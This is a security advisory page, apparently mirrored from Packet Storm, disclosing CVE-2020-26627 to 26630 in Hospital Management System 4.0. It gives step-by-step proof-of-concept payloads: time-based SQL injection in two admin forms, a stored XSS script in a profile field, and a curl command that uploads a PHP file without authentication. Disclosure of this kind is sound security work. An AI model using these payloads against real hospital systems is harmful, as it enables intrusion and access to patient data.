Hospital Management System 4.0 XSS / Shell Upload / SQL Injection

🗓️ 22 Dec 2023 00:00:00Reported by Louise Ng, Chris ChanType

packetstorm🔗 packetstormsecurity.com👁 489 Views

Multiple vulnerabilities in Hospital Management System v4.0 enable remote attackers to execute arbitrary web scripts. Update to v5.2.0 recommended

Reporter	Title	Published	Views	Family All 44
0day.today	Hospital Management System 4.0 XSS / Shell Upload / SQL Injection Vulnerabilities	22 Dec 202300:00	–	zdt
Circl	CVE-2020-26627	10 Jan 202410:26	–	circl
Circl	CVE-2020-26628	10 Jan 202410:26	–	circl
Circl	CVE-2020-26629	10 Jan 202410:26	–	circl
Circl	CVE-2020-26630	10 Jan 202410:26	–	circl
CNNVD	Hospital Management System SQL Injection Vulnerability	24 Dec 202300:00	–	cnnvd
CNNVD	Hospital Management System 跨站脚本漏洞	10 Jan 202400:00	–	cnnvd
CNNVD	Hospital Management System 安全漏洞	10 Jan 202400:00	–	cnnvd
CNNVD	Hospital Management System SQL注入漏洞	10 Jan 202400:00	–	cnnvd
CNVD	Hospital Management System SQL Injection Vulnerability	12 Jan 202400:00	–	cnvd

`Description: Mutiple vulnerabilties were discovered in Hospital Management System  
Affected CMS: Hospital Management System  
Affected Version: <= 4.0  
CVE ID: CVE-2020-26627, CVE-2020-26628, CVE-2020-26629, CVE-2020-26630  
CVSS Score: 7.2 (High)  
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H  
Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd  
  
Multiple vulnerabilities were discovered in Hospital Management System v4.0 and before which allows a remote attacker to execute arbitary web scripts.  
Proof of Concept:  
Attack Vector 1 (Time-Based SQL injection):  
Step 1.) Login admin  
Step 2.) Go to Conatctus Queries -> unread query -> type something in admin remark (e.g test) and submit  
Step 3.) Replace the POST body to below payload and server will respond after 5 second.  
adminremark='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&update=  
  
Attack Vector 2 (Time-Based SQL injection):  
Step 1.) Login admin  
Step 2.) Go to Doctors -> Doctor Specialization -> Click Submit  
Step 3.) Replace the POST body to below payload and server will respond after 5 second.  
doctorspecilization='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&submit=  
  
Attack Vector 3 (Cross Site Scripting (XSS)):  
After attacker login, attacker can append malicious javascript behind their name. Other people will trigger xss when they visit this user.  
Step 1.) Login patient page  
Step 2.) Got to My Profile>Edit Profile.  
Step 3.) Append <ScRiPt >alert("poc")</ScRiPt> behind username and save  
Step 4.) Other user visit this profile will trigger xss  
  
Attacker Vector 4 (Unauthenticated Arbitrary File Upload):  
The HMS is using a vulnerable jquery file upload. Attacker can upload any file to server and trigger it.  
Step 1.) upload file with below curl command:  
curl -i -s -k -X $'POST' \  
-H $'Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f' -H $'Host: localhost' -H $'Content-Length: 164' \  
--data-binary $'--a211583f728c46a09ca726497e0a5a9f\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"info.php\"\x0d\x0a\x0d\x0a<?php phpinfo(); ?>\x0d\x0a--a211583f728c46a09ca726497e0a5a9f--' \  
$'http://localhost/hsm/hms/admin/vendor/jquery-file-upload//server/php/index.php'  
Step 2.) visit the url in response and trigger the php file.  
  
  
  
Recommendation  
Update to v5.2.0  
  
https://phpgurukul.com/contact-us/  
https://phpgurukul.com/hospital-management-system-in-php  
`

22 Dec 2023 00:00Current

7.4High risk

Vulners AI Score7.4

EPSS0.00973